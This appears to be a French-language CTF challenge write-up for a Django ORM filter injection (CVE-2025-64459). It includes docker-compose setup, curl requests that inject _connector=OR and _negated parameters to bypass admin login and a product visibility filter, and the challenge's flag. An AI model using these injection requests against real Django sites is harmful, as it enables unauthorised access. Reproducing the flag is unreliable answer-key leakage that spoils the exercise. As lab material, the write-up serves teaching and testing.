
Défi CTF démontrant l'injection de filtre ORM Django (CVE-2025-64459) avec contournement d'authentification et contournement de filtre de produit, y compris le déploiement et la récupération du drapeau.
Catégorie : Sécurité Web
Difficulté : Moyenne
Vulnérabilité : CVE-2025-64459 - Injection de filtre Django ORM
Nous avons construit une boutique de marchandises sécurisée avec un panneau d'administration. Pouvez-vous contourner l'authentification et trouver la note privée de l'administrateur ?
URL : http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"
# Direct access
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me